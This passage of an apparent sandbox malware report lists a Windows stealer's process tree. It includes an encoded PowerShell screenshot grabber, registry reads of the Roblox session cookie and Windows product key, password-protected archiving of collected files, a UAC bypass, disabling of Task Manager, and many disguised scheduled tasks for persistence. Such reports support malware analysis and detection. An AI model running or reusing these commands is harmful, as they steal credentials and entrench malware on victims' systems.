ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
4⤵
PID:1548

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4956

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\clhqpich\clhqpich.cmdline"
6⤵
PID:5828

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES61D7.tmp" "c:\Users\Admin\AppData\Local\Temp\clhqpich\CSCA48DA33EC13447A782306B7255BFF376.TMP"
7⤵
PID:5920

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:5236

C:\Windows\SysWOW64\tree.com
tree /A /F
5⤵
PID:5360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:5408

C:\Windows\SysWOW64\tree.com
tree /A /F
5⤵
PID:5476

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:5604

C:\Windows\SysWOW64\tree.com
tree /A /F
5⤵
PID:5716

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:5748

C:\Windows\SysWOW64\tree.com
tree /A /F
5⤵
PID:5856

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
4⤵
PID:5876

C:\Windows\SysWOW64\tree.com
tree /A /F
5⤵
PID:5964

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
4⤵
PID:6104

C:\Windows\SysWOW64\getmac.exe
getmac
5⤵
PID:5256

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
4⤵
PID:5224

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
4⤵
PID:5436

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4860

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI9802\rar.exe a -r -hp"Popovik999" "C:\Users\Admin\AppData\Local\Temp\5ozPU.zip" *"
4⤵
PID:5884

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
5⤵
PID:5876

C:\Users\Admin\AppData\Local\Temp\_MEI9802\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI9802\rar.exe a -r -hp"Popovik999" "C:\Users\Admin\AppData\Local\Temp\5ozPU.zip" *
5⤵
- Executes dropped EXE
PID:6052

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
4⤵
PID:3416

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic os get Caption
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:6084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
4⤵
PID:3160

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
5⤵
PID:2116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
4⤵
PID:6096

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic csproduct get uuid
5⤵
PID:6116

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
4⤵
PID:880

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:1892

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
4⤵
PID:5172

C:\Windows\SysWOW64\Wbem\WMIC.exe
wmic path win32_VideoController get name
5⤵
- Detects videocard installed
PID:1208

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
4⤵
PID:1308

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
5⤵
- Suspicious behavior: EnumeratesProcesses
PID:452

C:\Users\Admin\AppData\Local\Temp\discord pro+.exe
"C:\Users\Admin\AppData\Local\Temp\discord pro+.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2920

C:\Users\Admin\AppData\Local\Temp\antiriser.bat
"C:\Users\Admin\AppData\Local\Temp\antiriser.bat"
3⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
PID:2940

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\chainwebwinref\iIb9loxeJUzN.vbe"
4⤵
- Checks computer location settings
PID:4296

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\chainwebwinref\PkXKubhHOUD.bat" "
5⤵
PID:5392

C:\chainwebwinref\Monitorcommon.exe
"C:\chainwebwinref\Monitorcommon.exe"
6⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Windows directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:5532

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\ExmY1HUQgT.bat"
7⤵
PID:5248

C:\Windows\system32\w32tm.exe
w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
8⤵
PID:4224

C:\chainwebwinref\Monitorcommon.exe
"C:\chainwebwinref\Monitorcommon.exe"
8⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- System policy modification
PID:540

C:\chainwebwinref\smss.exe
"C:\chainwebwinref\smss.exe"
9⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- System policy modification
PID:5572

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b88354e5-8752-445e-8725-9df1779f1cf0.vbs"
10⤵
PID:6016

C:\chainwebwinref\smss.exe
C:\chainwebwinref\smss.exe
11⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies registry class
- System policy modification
PID:3600

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fa861ffb-8aa5-4caa-8ff6-b3b68f2bf70e.vbs"
12⤵
PID:4296

C:\chainwebwinref\smss.exe
C:\chainwebwinref\smss.exe
13⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies registry class
- System policy modification
PID:5116

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f79cb8b5-6665-4f2f-ba03-1d5208f0533f.vbs"
14⤵
PID:5252

C:\chainwebwinref\smss.exe
C:\chainwebwinref\smss.exe
15⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies registry class
- System policy modification
PID:3280

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ce19699e-9ddd-4d60-8780-51b2e20e2a44.vbs"
16⤵
PID:5976

C:\chainwebwinref\smss.exe
C:\chainwebwinref\smss.exe
17⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies registry class
- System policy modification
PID:2640

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\d42acfed-526f-4378-9736-04c923f047be.vbs"
18⤵
PID:1648

C:\chainwebwinref\smss.exe
C:\chainwebwinref\smss.exe
19⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies registry class
- System policy modification
PID:3924

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\faa0d594-fcfc-4a5e-b11f-a68a30ad1094.vbs"
20⤵
PID:2408

C:\chainwebwinref\smss.exe
C:\chainwebwinref\smss.exe
21⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies registry class
- System policy modification
PID:5184

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1848440e-a7e7-4bc4-8092-989065c59c4c.vbs"
22⤵
PID:5060

C:\chainwebwinref\smss.exe
C:\chainwebwinref\smss.exe
23⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies registry class
- System policy modification
PID:5096

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\206d9fea-16a8-4244-bf86-f08d0237afab.vbs"
24⤵
PID:5444

C:\chainwebwinref\smss.exe
C:\chainwebwinref\smss.exe
25⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies registry class
- System policy modification
PID:5940

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f2d6be76-c19c-4bda-9887-cc087f99ddf7.vbs"
26⤵
PID:4464

C:\chainwebwinref\smss.exe
C:\chainwebwinref\smss.exe
27⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies registry class
- System policy modification
PID:3992

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\97c0bcf5-180f-4179-ac7b-7389e506e67f.vbs"
28⤵
PID:2640

C:\chainwebwinref\smss.exe
C:\chainwebwinref\smss.exe
29⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies registry class
- System policy modification
PID:2184

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ad559072-b3ae-4920-812f-116845d5db51.vbs"
30⤵
PID:1824

C:\chainwebwinref\smss.exe
C:\chainwebwinref\smss.exe
31⤵
- UAC bypass
- Checks computer location settings
- Executes dropped EXE
- Checks whether UAC is enabled
- Modifies registry class
- System policy modification
PID:2920

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ee0564a7-ff60-4c19-af41-4c79dd730756.vbs"
32⤵
PID:5156

C:\chainwebwinref\smss.exe
C:\chainwebwinref\smss.exe
33⤵
- UAC bypass
- Executes dropped EXE
- Checks whether UAC is enabled
- System policy modification
PID:632

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f8de5c92-10ab-4a79-aedd-62a3ce499e42.vbs"
32⤵
PID:5092

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\e7242c16-e7fc-4bcc-ad77-0913b048ed9d.vbs"
30⤵
PID:440

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\69f0acf7-e4d5-49e6-8111-f74eb42dac3a.vbs"
28⤵
PID:4744

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\ed819ade-c500-43fd-8e60-a5634a8c5d2d.vbs"
26⤵
PID:5400

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b430c31d-aee4-4d35-a9b1-8398f9510125.vbs"
24⤵
PID:3884

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\5b97b274-8cd6-49b8-8aae-705c80e6797e.vbs"
22⤵
PID:3828

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3e4f3cbd-3d56-4866-ba80-cd96d42aa30f.vbs"
20⤵
PID:4340

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\eb0342a2-93c8-4a41-a8d2-417b90289d8b.vbs"
18⤵
PID:4896

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c2feabca-a42d-46ba-b43a-7100666c45cb.vbs"
16⤵
PID:6012

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f9ba67ae-1550-4bb3-afd0-4140cc79c3be.vbs"
14⤵
PID:452

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\576893a7-6ea2-4907-b049-e771bd0b97d0.vbs"
12⤵
PID:380

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9fd80c1a-9677-4a06-81e2-06f9ba95c0a5.vbs"
10⤵
PID:3344

C:\Windows\SysWOW64\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
6⤵
- Modifies registry key
PID:6064

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\chainwebwinref\file.vbs"
4⤵
PID:3224

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5556

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft OneDrive\setup\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5936

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Users\All Users\Microsoft OneDrive\setup\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\chainwebwinref\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\chainwebwinref\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 5 /tr "'C:\chainwebwinref\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5992

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 13 /tr "'C:\chainwebwinref\upfc.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5400

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\chainwebwinref\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:6040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 6 /tr "'C:\chainwebwinref\upfc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4728

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 8 /tr "'C:\chainwebwinref\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3328

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\chainwebwinref\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\chainwebwinref\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BuiltB" /sc MINUTE /mo 11 /tr "'C:\Windows\Downloaded Program Files\Built.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4464

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Built" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\Built.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5484

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "BuiltB" /sc MINUTE /mo 6 /tr "'C:\Windows\Downloaded Program Files\Built.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2936

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
1⤵
PID:2920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\chainwebwinref\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5844

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\chainwebwinref\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 12 /tr "'C:\chainwebwinref\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5804

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4860

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 13 /tr "'C:\chainwebwinref\fontdrvhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5952

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\chainwebwinref\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5780

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "fontdrvhostf" /sc MINUTE /mo 14 /tr "'C:\chainwebwinref\fontdrvhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\chainwebwinref\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\chainwebwinref\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\chainwebwinref\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:5988

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 13 /tr "'C:\Windows\PLA\Rules\es-ES\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4840

C:\Windows\system32\schtasks.exe
